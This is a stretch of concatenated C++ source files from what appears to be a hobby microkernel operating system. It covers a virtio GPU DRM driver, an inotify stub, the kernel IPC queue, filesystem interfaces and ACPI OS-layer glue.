}))
std::unique_ptr<drm_core::Configuration> GfxDevice::createConfiguration() {
return std::make_unique<Configuration>(this);
}
std::shared_ptr<drm_core::FrameBuffer> GfxDevice::createFrameBuffer(std::shared_ptr<drm_core::BufferObject> base_bo,
uint32_t width, uint32_t height, uint32_t format, uint32_t pitch) {
auto bo = std::static_pointer_cast<GfxDevice::BufferObject>(base_bo);
assert(pitch % 4 == 0);
assert(pitch / 4 >= width);
assert(bo->getSize() >= pitch * height);
auto fb = std::make_shared<FrameBuffer>(this, bo);
fb->setupWeakPtr(fb);
registerObject(fb.get());
return fb;
}
std::tuple<int, int, int> GfxDevice::driverVersion() {
return {0, 0, 1};
}
std::tuple<std::string, std::string, std::string> GfxDevice::driverInfo() {
return {"virtio_gpu", "virtio GPU", "0"};
}
std::pair<std::shared_ptr<drm_core::BufferObject>, uint32_t>
GfxDevice::createDumb(uint32_t width, uint32_t height, uint32_t bpp) {
HelHandle handle;
auto size = ((width * height * bpp / 8) + (4096 - 1)) & ~(4096 - 1);
HEL_CHECK(helAllocateMemory(size, 0, &handle));
auto bo = std::make_shared<BufferObject>(this, _hwAllocator.allocate(), size,
helix::UniqueDescriptor(handle), width, height);
uint32_t pitch = width * bpp / 8;
auto mapping = installMapping(bo.get());
bo->setupMapping(mapping);
bo->_initHw();
return std::make_pair(bo, pitch);
}
// ----------------------------------------------------------------
// GfxDevice::Configuration.
// ----------------------------------------------------------------
bool GfxDevice::Configuration::capture(std::vector<drm_core::Assignment> assignment) {
auto captureScanout = [&] (int index) {
if(_state[index])
return;
_state[index].emplace();
// TODO: Capture FB, width and height.
_state[index]->mode = _device->_theCrtcs[index]->currentMode();
};
for(auto &assign : assignment) {
if(assign.property == _device->srcWProperty()) {
//TODO: check this outside of capure
assert(assign.property->validate(assign));
auto plane = static_cast<Plane *>(assign.object.get());
captureScanout(plane->scanoutId());
_state[plane->scanoutId()]->width = assign.intValue;
}else if(assign.property == _device->srcHProperty()) {
//TODO: check this outside of capure
assert(assign.property->validate(assign));
auto plane = static_cast<Plane *>(assign.object.get());
captureScanout(plane->scanoutId());
_state[plane->scanoutId()]->height = assign.intValue;
}else if(assign.property == _device->fbIdProperty()) {
//TODO: check this outside of capure
assert(assign.property->validate(assign));
auto plane = static_cast<Plane *>(assign.object.get());
auto fb = assign.objectValue->asFrameBuffer();
captureScanout(plane->scanoutId());
_state[plane->scanoutId()]->fb = static_cast<GfxDevice::FrameBuffer *>(fb);
}else if(assign.property == _device->modeIdProperty()) {
//TODO: check this outside of capture.
assert(assign.property->validate(assign));
auto crtc = static_cast<Crtc *>(assign.object.get());
captureScanout(crtc->scanoutId());
_state[crtc->scanoutId()]->mode = assign.blobValue;
}else{
return false;
}
}
for(size_t i = 0; i < _state.size(); i++) {
if(!_state[i])
continue;
if(_state[i]->mode) {
// TODO: Consider current width/height if FB did not change.
drm_mode_modeinfo mode_info;
memcpy(&mode_info, _state[i]->mode->data(), sizeof(drm_mode_modeinfo));
_state[i]->height = mode_info.vdisplay;
_state[i]->width = mode_info.hdisplay;
// TODO: Check max dimensions: _state[i]->width > 1024 || _state[i]->height > 768
if(_state[i]->width <= 0 || _state[i]->height <= 0)
return false;
if(!_state[i]->fb)
return false;
}
}
return true;
}
void GfxDevice::Configuration::dispose() {
}
void GfxDevice::Configuration::commit() {
for(size_t i = 0; i < _state.size(); i++) {
if(!_state[i])
continue;
_device->_theCrtcs[i]->setCurrentMode(_state[i]->mode);
}
_dispatch();
}
COFIBER_ROUTINE(cofiber::no_future, GfxDevice::Configuration::_dispatch(), ([=] {
for(size_t i = 0; i < _state.size(); i++) {
if(!_state[i])
continue;
if(!_device->_claimedDevice) {
COFIBER_AWAIT _device->_transport->hwDevice().claimDevice();
_device->_claimedDevice = true;
}
if(!_state[i]->mode) {
std::cout << "gfx/virtio: Disable scanout" << std::endl;
spec::SetScanout scanout;
memset(&scanout, 0, sizeof(spec::SetScanout));
scanout.header.type = spec::cmd::setScanout;
spec::Header scanout_result;
virtio_core::Request scanout_request;
virtio_core::Chain scanout_chain;
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice,
scanout_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &scanout, sizeof(spec::SetScanout)});
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost,
scanout_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &scanout_result, sizeof(spec::Header)});
COFIBER_AWAIT AwaitableRequest{_device->_controlQ, scanout_chain.front()};
continue;
}
COFIBER_AWAIT _state[i]->fb->getBufferObject()->wait();
// std::cout << "Swap to framebuffer " << _state[i]->fb->id()
// << " " << _state[i]->width << "x" << _state[i]->height << std::endl;
spec::XferToHost2d xfer;
memset(&xfer, 0, sizeof(spec::XferToHost2d));
xfer.header.type = spec::cmd::xferToHost2d;
xfer.rect.x = 0;
xfer.rect.y = 0;
xfer.rect.width = _state[i]->width;
xfer.rect.height = _state[i]->height;
xfer.resourceId = _state[i]->fb->getBufferObject()->hardwareId();
spec::Header xfer_result;
virtio_core::Chain xfer_chain;
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice,
xfer_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &xfer, sizeof(spec::XferToHost2d)});
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost,
xfer_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &xfer_result, sizeof(spec::Header)});
COFIBER_AWAIT AwaitableRequest{_device->_controlQ, xfer_chain.front()};
assert(xfer_result.type == spec::resp::noData);
spec::SetScanout scanout;
memset(&scanout, 0, sizeof(spec::SetScanout));
scanout.header.type = spec::cmd::setScanout;
scanout.rect.x = 0;
scanout.rect.y = 0;
scanout.rect.width = _state[i]->width;
scanout.rect.height = _state[i]->height;
scanout.scanoutId = i;
scanout.resourceId = _state[i]->fb->getBufferObject()->hardwareId();
spec::Header scanout_result;
virtio_core::Chain scanout_chain;
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice,
scanout_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &scanout, sizeof(spec::SetScanout)});
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost,
scanout_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &scanout_result, sizeof(spec::Header)});
COFIBER_AWAIT AwaitableRequest{_device->_controlQ, scanout_chain.front()};
assert(scanout_result.type == spec::resp::noData);
spec::ResourceFlush flush;
memset(&flush, 0, sizeof(spec::ResourceFlush));
flush.header.type = spec::cmd::resourceFlush;
flush.rect.x = 0;
flush.rect.y = 0;
flush.rect.width = _state[i]->width;
flush.rect.height = _state[i]->height;
flush.resourceId = _state[i]->fb->getBufferObject()->hardwareId();
spec::Header flush_result;
virtio_core::Chain flush_chain;
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice,
flush_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &flush, sizeof(spec::ResourceFlush)});
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost,
flush_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &flush_result, sizeof(spec::Header)});
COFIBER_AWAIT AwaitableRequest{_device->_controlQ, flush_chain.front()};
assert(flush_result.type == spec::resp::noData);
}
complete();
}))
// ----------------------------------------------------------------
// GfxDevice::Connector.
// ----------------------------------------------------------------
GfxDevice::Connector::Connector(GfxDevice *device)
: drm_core::Connector { device->allocator.allocate() } {
// _encoders.push_back(device->_theEncoder.get());
}
// ----------------------------------------------------------------
// GfxDevice::Encoder.
// ----------------------------------------------------------------
GfxDevice::Encoder::Encoder(GfxDevice *device)
:drm_core::Encoder { device->allocator.allocate() } {
}
// ----------------------------------------------------------------
// GfxDevice::Crtc.
// ----------------------------------------------------------------
GfxDevice::Crtc::Crtc(GfxDevice *device, int id, std::shared_ptr<Plane> plane)
:drm_core::Crtc { device->allocator.allocate() } {
_device = device;
_scanoutId = id;
_primaryPlane = plane;
}
drm_core::Plane *GfxDevice::Crtc::primaryPlane() {
return _primaryPlane.get();
}
int GfxDevice::Crtc::scanoutId() {
return _scanoutId;
}
// ----------------------------------------------------------------
// GfxDevice::FrameBuffer.
// ----------------------------------------------------------------
GfxDevice::FrameBuffer::FrameBuffer(GfxDevice *device,
std::shared_ptr<GfxDevice::BufferObject> bo)
: drm_core::FrameBuffer { device->allocator.allocate() } {
_bo = bo;
_device = device;
}
GfxDevice::BufferObject *GfxDevice::FrameBuffer::getBufferObject() {
return _bo.get();
}
void GfxDevice::FrameBuffer::notifyDirty() {
_xferAndFlush();
}
COFIBER_ROUTINE(cofiber::no_future, GfxDevice::FrameBuffer::_xferAndFlush(), ([=] {
spec::XferToHost2d xfer;
memset(&xfer, 0, sizeof(spec::XferToHost2d));
xfer.header.type = spec::cmd::xferToHost2d;
xfer.rect.x = 0;
xfer.rect.y = 0;
xfer.rect.width = _bo->getWidth();
xfer.rect.height = _bo->getHeight();
xfer.resourceId = _bo->hardwareId();
spec::Header xfer_result;
virtio_core::Request xfer_request;
virtio_core::Chain xfer_chain;
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice, xfer_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &xfer, sizeof(spec::XferToHost2d)});
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost, xfer_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &xfer_result, sizeof(spec::Header)});
COFIBER_AWAIT AwaitableRequest{_device->_controlQ, xfer_chain.front()};
spec::ResourceFlush flush;
memset(&flush, 0, sizeof(spec::ResourceFlush));
flush.header.type = spec::cmd::resourceFlush;
flush.rect.x = 0;
flush.rect.y = 0;
flush.rect.width = _bo->getWidth();
flush.rect.height = _bo->getHeight();
flush.resourceId = _bo->hardwareId();
spec::Header flush_result;
virtio_core::Request flush_request;
virtio_core::Chain flush_chain;
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice, flush_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &flush, sizeof(spec::ResourceFlush)});
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost, flush_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &flush_result, sizeof(spec::Header)});
COFIBER_AWAIT AwaitableRequest{_device->_controlQ, flush_chain.front()};
}));
// ----------------------------------------------------------------
// GfxDevice: Plane.
// ----------------------------------------------------------------
GfxDevice::Plane::Plane(GfxDevice *device, int id)
:drm_core::Plane { device->allocator.allocate() } {
_scanoutId = id;
}
int GfxDevice::Plane::scanoutId() {
return _scanoutId;
}
// ----------------------------------------------------------------
// GfxDevice: BufferObject.
// ----------------------------------------------------------------
std::shared_ptr<drm_core::BufferObject> GfxDevice::BufferObject::sharedBufferObject() {
return this->shared_from_this();
}
size_t GfxDevice::BufferObject::getSize() {
return _size;
}
uint32_t GfxDevice::BufferObject::getWidth() {
return _width;
}
uint32_t GfxDevice::BufferObject::getHeight() {
return _height;
}
uint32_t GfxDevice::BufferObject::hardwareId() {
return _hardwareId;
}
async::result<void> GfxDevice::BufferObject::wait() {
return async::make_result(_jump.async_wait());
}
std::pair<helix::BorrowedDescriptor, uint64_t> GfxDevice::BufferObject::getMemory() {
return std::make_pair(helix::BorrowedDescriptor(_memory), 0);
}
COFIBER_ROUTINE(cofiber::no_future, GfxDevice::BufferObject::_initHw(), ([=] {
void *ptr;
HEL_CHECK(helMapMemory(_memory.getHandle(), kHelNullHandle,
nullptr, 0, getSize(), kHelMapProtRead, &ptr));
spec::Create2d buffer;
memset(&buffer, 0, sizeof(spec::Create2d));
buffer.header.type = spec::cmd::create2d;
buffer.resourceId = _hardwareId;
buffer.format = spec::format::bgrx;
buffer.width = getWidth();
buffer.height = getHeight();
spec::Header result;
virtio_core::Request request;
virtio_core::Chain chain;
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice, chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &buffer, sizeof(spec::Create2d)});
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost, chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &result, sizeof(spec::Header)});
COFIBER_AWAIT AwaitableRequest{_device->_controlQ, chain.front()};
std::vector<spec::MemEntry> entries;
for(size_t page = 0; page < getSize(); page += 4096) {
spec::MemEntry entry;
memset(&entry, 0, sizeof(spec::MemEntry));
uintptr_t physical;
HEL_CHECK(helPointerPhysical((reinterpret_cast<char *>(ptr) + page), &physical));
entry.address = physical;
entry.length = 4096;
entries.push_back(entry);
}
spec::AttachBacking attachment;
memset(&attachment, 0, sizeof(spec::AttachBacking));
attachment.header.type = spec::cmd::attachBacking;
attachment.resourceId = _hardwareId;
attachment.numEntries = entries.size();
spec::Header attach_result;
virtio_core::Chain attach_chain;
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice, attach_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &attachment, sizeof(spec::AttachBacking)});
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice, attach_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, entries.data(), entries.size() * sizeof(spec::MemEntry)});
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost, attach_chain, _device->_controlQ,
arch::dma_buffer_view{nullptr, &attach_result, sizeof(spec::Header)});
COFIBER_AWAIT AwaitableRequest{_device->_controlQ, attach_chain.front()};
assert(attach_result.type == spec::resp::noData);
_jump.trigger();
}));
// ----------------------------------------------------------------
// Freestanding PCI discovery functions.
// ----------------------------------------------------------------
COFIBER_ROUTINE(cofiber::no_future, bindController(mbus::Entity entity), ([=] {
protocols::hw::Device hw_device(COFIBER_AWAIT entity.bind());
auto transport = COFIBER_AWAIT virtio_core::discover(std::move(hw_device),
virtio_core::DiscoverMode::modernOnly);
auto gfx_device = std::make_shared<GfxDevice>(std::move(transport));
gfx_device->initialize();
// Create an mbus object for the device.
auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();
mbus::Properties descriptor{
{"unix.subsystem", mbus::StringItem{"drm"}},
{"unix.devname", mbus::StringItem{"dri/card0"}}
};
auto handler = mbus::ObjectHandler{}
.withBind([=] () -> async::result<helix::UniqueDescriptor> {
helix::UniqueLane local_lane, remote_lane;
std::tie(local_lane, remote_lane) = helix::createStream();
serveDevice(gfx_device, std::move(local_lane));
async::promise<helix::UniqueDescriptor> promise;
promise.set_value(std::move(remote_lane));
return promise.async_get();
});
COFIBER_AWAIT root.createObject("gfx_virtio", descriptor, std::move(handler));
}))
COFIBER_ROUTINE(cofiber::no_future, observeControllers(), ([] {
auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();
auto filter = mbus::Conjunction({
mbus::EqualsFilter("pci-vendor", "1af4"),
mbus::EqualsFilter("pci-device", "1050")
});
auto handler = mbus::ObserverHandler{}
.withAttach([] (mbus::Entity entity, mbus::Properties properties) {
std::cout << "gfx/virtio: Detected device" << std::endl;
bindController(std::move(entity));
});
COFIBER_AWAIT root.linkObserver(std::move(filter), std::move(handler));
}))
int main() {
std::cout << "gfx/virtio: Starting driver" << std::endl;
{
async::queue_scope scope{helix::globalQueue()};
observeControllers();
}
helix::globalQueue()->run();
return 0;
}
<file_sep>
#include <string.h>
#include <iostream>
#include <async/doorbell.hpp>
#include <cofiber.hpp>
#include <helix/ipc.hpp>
#include "inotify.hpp"
namespace inotify {
namespace {
struct OpenFile : File {
public:
static void serve(smarter::shared_ptr<OpenFile> file) {
//TODO: assert(!file->_passthrough);
helix::UniqueLane lane;
std::tie(lane, file->_passthrough) = helix::createStream();
async::detach(protocols::fs::servePassthrough(std::move(lane),
smarter::shared_ptr<File>{file}, &File::fileOperations));
}
OpenFile()
: File{StructName::get("inotify")} { }
COFIBER_ROUTINE(expected<size_t>,
readSome(Process *, void *data, size_t max_length) override, ([=] {
throw std::runtime_error("read() from inotify is not implemented");
}))
COFIBER_ROUTINE(expected<PollResult>, poll(Process *, uint64_t sequence,
async::cancellation_token) override, ([=] {
std::cout << "posix: Fix inotify::poll()" << std::endl;
COFIBER_AWAIT cofiber::suspend_always{};
}))
helix::BorrowedDescriptor getPassthroughLane() override {
return _passthrough;
}
private:
helix::UniqueLane _passthrough;
};
} // anonymous namespace
smarter::shared_ptr<File, FileHandle> createFile() {
auto file = smarter::make_shared<OpenFile>();
file->setupWeakFile(file);
OpenFile::serve(file);
return File::constructHandle(std::move(file));
}
} // namespace inotify
<file_sep>#ifndef POSIX_SUBSYSTEM_INPUT_SYSTEM_HPP
#define POSIX_SUBSYSTEM_INPUT_SYSTEM_HPP
#include <cofiber.hpp>
namespace input_subsystem {
cofiber::no_future run();
} // namespace input_subsystem
#endif // POSIX_SUBSYSTEM_INPUT_SYSTEM_HPP
<file_sep>
#include <string.h>
#include <frg/container_of.hpp>
#include <frigg/debug.hpp>
#include "ipc-queue.hpp"
#include "kernel.hpp"
namespace thor {
// ----------------------------------------------------------------------------
// IpcQueue
// ----------------------------------------------------------------------------
IpcQueue::IpcQueue(smarter::shared_ptr<AddressSpace, BindableHandle> space, void *pointer)
: _space{frigg::move(space)}, _pointer{pointer},
_waitInFutex{false},
_currentChunk{nullptr}, _currentProgress{0}, _nextIndex{0},
_chunks{*kernelAlloc} {
_queuePin = AddressSpaceLockHandle{_space, _pointer, sizeof(QueueStruct)};
_acquireNode.setup(nullptr);
auto acq = _queuePin.acquire(&_acquireNode);
assert(acq);
_queueAccessor = DirectSpaceAccessor<QueueStruct>{_queuePin, 0};
// TODO: Take this as a constructor parameter.
_sizeShift = _queueAccessor.get()->sizeShift;
_chunks.resize(1 << _sizeShift);
}
void IpcQueue::setupChunk(size_t index, smarter::shared_ptr<AddressSpace, BindableHandle> space, void *pointer) {
auto irq_lock = frigg::guard(&irqMutex());
auto lock = frigg::guard(&_mutex);
assert(index < _chunks.size());
assert(&_chunks[index] != _currentChunk);
_chunks[index] = Chunk{frigg::move(space), pointer};
}
void IpcQueue::submit(IpcNode *node) {
auto irq_lock = frigg::guard(&irqMutex());
auto lock = frigg::guard(&_mutex);
struct Ops {
static void ready(Worklet *worklet) {
auto node = frg::container_of(worklet, &IpcNode::_worklet);
auto self = node->_queue;
auto irq_lock = frigg::guard(&irqMutex());
auto lock = frigg::guard(&self->_mutex);
self->_progress();
}
};
assert(!node->_queueNode.in_list);
node->_queue = this;
node->_worklet.setup(&Ops::ready);
auto was_empty = _nodeQueue.empty();
_nodeQueue.push_back(node);
if(was_empty)
_progress();
}
void IpcQueue::_progress() {
while(true) {
assert(!_waitInFutex);
assert(!_nodeQueue.empty());
// Advance the queue if necessary.
if(!_currentChunk) {
_advanceChunk();
if(_waitInFutex)
return;
}
// Check if we have to retire the current chunk.
size_t length = 0;
for(auto source = _nodeQueue.front()->_source; source; source = source->link)
length += (source->size + 7) & ~size_t(7);
if(_currentProgress + length > _currentChunk->bufferSize) {
_retireChunk();
continue;
}
// Emit the next element to the current chunk.
auto node = _nodeQueue.pop_front();
auto dest = reinterpret_cast<Address>(_currentChunk->pointer)
+ offsetof(ChunkStruct, buffer) + _currentProgress;
assert(!(dest & 0x7));
auto accessor = AddressSpaceLockHandle{_currentChunk->space,
reinterpret_cast<void *>(dest), sizeof(ElementStruct) + length};
_acquireNode.setup(nullptr);
auto acq = accessor.acquire(&_acquireNode);
assert(acq);
ElementStruct element;
memset(&element, 0, sizeof(element));
element.length = length;
element.context = reinterpret_cast<void *>(node->_context);
auto err = accessor.write(0, &element, sizeof(ElementStruct));
assert(!err);
size_t disp = sizeof(ElementStruct);
for(auto source = node->_source; source; source = source->link) {
err = accessor.write(disp, source->pointer, source->size);
assert(!err);
disp += (source->size + 7) & ~size_t(7);
}
node->complete();
// Update the chunk progress futex.
_currentProgress += sizeof(ElementStruct) + length;
_wakeProgressFutex(false);
if(!_nodeQueue.empty())
WorkQueue::post(&_nodeQueue.front()->_worklet);
return;
}
}
void IpcQueue::_advanceChunk() {
assert(!_currentChunk);
if(_waitHeadFutex())
return;
auto source = reinterpret_cast<Address>(_pointer) + offsetof(QueueStruct, indexQueue)
+ (_nextIndex & ((1 << _sizeShift) - 1)) * sizeof(int);
auto accessor = AddressSpaceLockHandle{_space,
reinterpret_cast<void *>(source), sizeof(int)};
_acquireNode.setup(nullptr);
auto acq = accessor.acquire(&_acquireNode);
assert(acq);
size_t cn = accessor.read<int>(0);
assert(cn < _chunks.size());
assert(_chunks[cn].space);
_currentChunk = &_chunks[cn];
_nextIndex = ((_nextIndex + 1) & kHeadMask);
_chunkPin = AddressSpaceLockHandle{_currentChunk->space,
_currentChunk->pointer, sizeof(ChunkStruct)};
_acquireNode.setup(nullptr);
auto acq_chunk = _chunkPin.acquire(&_acquireNode);
assert(acq_chunk);
_chunkAccessor = DirectSpaceAccessor<ChunkStruct>{_chunkPin, 0};
}
void IpcQueue::_retireChunk() {
assert(_currentChunk);
_wakeProgressFutex(true);
_chunkAccessor = DirectSpaceAccessor<ChunkStruct>{};
_chunkPin = AddressSpaceLockHandle{};
_currentChunk = nullptr;
_currentProgress = 0;
}
bool IpcQueue::_waitHeadFutex() {
struct Ops {
static void woken(Worklet *worklet) {
auto self = frg::container_of(worklet, &IpcQueue::_worklet);
auto irq_lock = frigg::guard(&irqMutex());
auto lock = frigg::guard(&self->_mutex);
self->_waitInFutex = false;
self->_progress();
}
};
auto node = _nodeQueue.front();
while(true) {
auto futex = __atomic_load_n(&_queueAccessor.get()->headFutex, __ATOMIC_ACQUIRE);
do {
if(_nextIndex != (futex & kHeadMask))
return false;
// TODO: Contract violation errors should be reported to user-space.
assert(futex == _nextIndex);
} while(!__atomic_compare_exchange_n(&_queueAccessor.get()->headFutex, &futex,
_nextIndex | kHeadWaiters, false, __ATOMIC_ACQUIRE, __ATOMIC_ACQUIRE));
auto fa = reinterpret_cast<Address>(_pointer) + offsetof(QueueStruct, headFutex);
_worklet.setup(&Ops::woken);
_futex.setup(&_worklet);
_waitInFutex = _space->futexSpace.checkSubmitWait(fa, [&] {
return __atomic_load_n(&_queueAccessor.get()->headFutex, __ATOMIC_RELAXED)
== (_nextIndex | kHeadWaiters);
}, &_futex);
if(_waitInFutex)
return true;
}
}
void IpcQueue::_wakeProgressFutex(bool done) {
auto progress = _currentProgress;
if(done)
progress |= kProgressDone;
auto futex = __atomic_exchange_n(&_chunkAccessor.get()->progressFutex,
progress, __ATOMIC_RELEASE);
// If user-space modifies any non-flags field, that's a contract violation.
// TODO: Shut down the queue in this case.
if(futex & kProgressWaiters) {
auto fa = reinterpret_cast<Address>(_currentChunk->pointer)
+ offsetof(ChunkStruct, progressFutex);
_currentChunk->space->futexSpace.wake(fa);
}
}
} // namespace thor
<file_sep>
#ifndef LIBARCH_REGISTER_HPP
#define LIBARCH_REGISTER_HPP
#include <stddef.h>
#include <arch/bits.hpp>
namespace arch {
template<typename R, typename B, typename P = ptrdiff_t>
struct basic_register {
using rep_type = R;
using bits_type = B;
explicit constexpr basic_register(P offset)
: _offset(offset) { }
P offset() const {
return _offset;
}
private:
P _offset;
};
template<typename T, typename P = ptrdiff_t>
using scalar_register = basic_register<T, T, P>;
template<typename B, typename P = ptrdiff_t>
using bit_register = basic_register<bit_value<B>, B, P>;
} // namespace arch
#endif // LIBARCH_REGISTER_HPP
<file_sep>
#include <string.h>
#include <iostream>
#include <cofiber.hpp>
#include <protocols/mbus/client.hpp>
#include "../common.hpp"
#include "../device.hpp"
#include "../util.hpp"
#include "../vfs.hpp"
namespace drm_subsystem {
namespace {
id_allocator<uint32_t> minorAllocator;
struct Subsystem {
Subsystem() {
minorAllocator.use_range(0);
}
} subsystem;
struct Device : UnixDevice {
Device(VfsType type, std::string name, helix::UniqueLane lane)
: UnixDevice{type},
_name{std::move(name)}, _lane{std::move(lane)} { }
std::string nodePath() override {
return _name;
}
FutureMaybe<smarter::shared_ptr<File, FileHandle>> open(std::shared_ptr<FsLink> link,
SemanticFlags semantic_flags) override {
return openExternalDevice(_lane, std::move(link), semantic_flags);
}
private:
std::string _name;
helix::UniqueLane _lane;
};
} // anonymous namepsace
COFIBER_ROUTINE(cofiber::no_future, run(), ([] {
auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();
auto filter = mbus::Conjunction({
mbus::EqualsFilter("unix.subsystem", "drm")
});
auto handler = mbus::ObserverHandler{}
.withAttach([] (mbus::Entity entity, mbus::Properties properties) {
std::cout << "POSIX: Installing DRM device "
<< std::get<mbus::StringItem>(properties.at("unix.devname")).value << std::endl;
auto lane = helix::UniqueLane(COFIBER_AWAIT entity.bind());
auto device = std::make_shared<Device>(VfsType::charDevice,
std::get<mbus::StringItem>(properties.at("unix.devname")).value,
std::move(lane));
// The minor is only correct for card* devices but not for control* and render*.
device->assignId({226, minorAllocator.allocate()});
charRegistry.install(device);
});
COFIBER_AWAIT root.linkObserver(std::move(filter), std::move(handler));
}))
} // namespace drm_subsystem
<file_sep>#ifndef POSIX_SUBSYSTEM_FS_HPP
#define POSIX_SUBSYSTEM_FS_HPP
#include <iostream>
#include <set>
#include <async/result.hpp>
#include <boost/intrusive/rbtree.hpp>
#include <cofiber.hpp>
#include <cofiber/future.hpp>
#include <hel.h>
#include "file.hpp"
#include "fs.hpp"
using DeviceId = std::pair<int, int>;
enum class VfsType {
null, directory, regular, symlink, charDevice, blockDevice, socket, fifo
};
struct FileStats {
uint64_t inodeNumber;
int numLinks;
uint64_t fileSize;
uint32_t mode;
int uid, gid;
uint64_t atimeSecs, atimeNanos;
uint64_t mtimeSecs, mtimeNanos;
uint64_t ctimeSecs, ctimeNanos;
};
// Forward declarations.
struct FsLink;
struct FsNode;
// ----------------------------------------------------------------------------
// FsLink class.
// ----------------------------------------------------------------------------
// Represents a directory entry on an actual file system (i.e. not in the VFS).
struct FsLink {
virtual std::shared_ptr<FsNode> getOwner() = 0;
virtual std::string getName() = 0;
virtual std::shared_ptr<FsNode> getTarget() = 0;
};
struct FsSuperblock {
virtual FutureMaybe<std::shared_ptr<FsNode>> createRegular() = 0;
virtual FutureMaybe<std::shared_ptr<FsNode>> createSocket() = 0;
virtual async::result<std::shared_ptr<FsLink>> rename(FsLink *source,
FsNode *directory, std::string name) = 0;
};
// ----------------------------------------------------------------------------
// FsNode class.
// ----------------------------------------------------------------------------
using SemanticFlags = uint32_t;
inline constexpr SemanticFlags semanticNonBlock = 1;
// Represents an inode on an actual file system (i.e. not in the VFS).
struct FsNode {
// TODO: Remove this constructor once every FS has a superblock.
FsNode()
: _superblock{nullptr} { }
FsNode(FsSuperblock *superblock)
: _superblock{superblock} { }
FsSuperblock *superblock() {
return _superblock;
}
virtual VfsType getType();
// TODO: This should be async.
virtual FutureMaybe<FileStats> getStats();
// For directories only: Returns a pointer to the link
// that links this directory from its parent.
virtual std::shared_ptr<FsLink> treeLink();
//! Resolves a file in a directory (directories only).
virtual FutureMaybe<std::shared_ptr<FsLink>> getLink(std::string name);
//! Links an existing node to this directory (directories only).
virtual FutureMaybe<std::shared_ptr<FsLink>> link(std::string name,
std::shared_ptr<FsNode> target);
//! Creates a new directory (directories only).
virtual FutureMaybe<std::shared_ptr<FsLink>> mkdir(std::string name);
//! Creates a new symlink (directories only).
virtual FutureMaybe<std::shared_ptr<FsLink>> symlink(std::string name, std::string path);
//! Creates a new device file (directories only).
virtual FutureMaybe<std::shared_ptr<FsLink>> mkdev(std::string name,
VfsType type, DeviceId id);
virtual FutureMaybe<void> unlink(std::string name);
//! Opens the file (regular files only).
// TODO: Move this to the link instead of the inode?
virtual FutureMaybe<smarter::shared_ptr<File, FileHandle>> open(std::shared_ptr<FsLink> link,
SemanticFlags semantic_flags);
// Reads the target of a symlink (symlinks only).
// Returns illegalOperationTarget() by default.
virtual expected<std::string> readSymlink(FsLink *link);
//! Read the major/minor device number (devices only).
virtual DeviceId readDevice();
private:
FsSuperblock *_superblock;
};
#endif // POSIX_SUBSYSTEM_FS_HPP
<file_sep>
#include <frigg/debug.hpp>
#include <frigg/printf.hpp>
#include <frigg/memory.hpp>
#include "../../arch/x86/paging.hpp"
#include "../../arch/x86/pic.hpp"
#include "../../generic/irq.hpp"
#include "../../generic/kernel_heap.hpp"
#include "../../system/pci/pci.hpp"
extern "C" {
#include <acpi.h>
}
namespace {
constexpr bool logEverySci = false;
}
#define NOT_IMPLEMENTED() do { assert(!"Fix this"); /* frigg::panicLogger() << "ACPI interface function " << __func__ << " is not implemented!" << frigg::endLog;*/ } while(0)
using namespace thor;
// --------------------------------------------------------
// Initialization and shutdown
// --------------------------------------------------------
ACPI_STATUS AcpiOsInitialize() {
return AE_OK;
}
ACPI_STATUS AcpiOsTerminate() {
return AE_OK;
}
ACPI_PHYSICAL_ADDRESS AcpiOsGetRootPointer() {
ACPI_SIZE pointer;
if(AcpiFindRootPointer(&pointer) != AE_OK)
frigg::panicLogger() << "thor: Could not find ACPI RSDP table" << frigg::endLog;
return pointer;
}
// --------------------------------------------------------
// Logging
// --------------------------------------------------------
void ACPI_INTERNAL_VAR_XFACE AcpiOsPrintf(const char *format, ...) {
va_list args;
va_start(args, format);
AcpiOsVprintf(format, args);
va_end(args);
}
void AcpiOsVprintf(const char *format, va_list args) {
auto printer = frigg::infoLogger();
// frigg::infoLogger() << "printf: " << format << frigg::endLog;
frigg::printf(printer, format, args);
// TODO: Call finish()?
// printer.finish();
}
// --------------------------------------------------------
// Locks
// --------------------------------------------------------
ACPI_STATUS AcpiOsCreateLock(ACPI_SPINLOCK *out_handle) {
// TODO: implement this
return AE_OK;
}
void AcpiOsDeleteLock(ACPI_HANDLE handle) {
// TODO: implement this
}
// this function should disable interrupts
ACPI_CPU_FLAGS AcpiOsAcquireLock(ACPI_SPINLOCK spinlock) {
// TODO: implement this
return 0;
}
// this function should re-enable interrupts
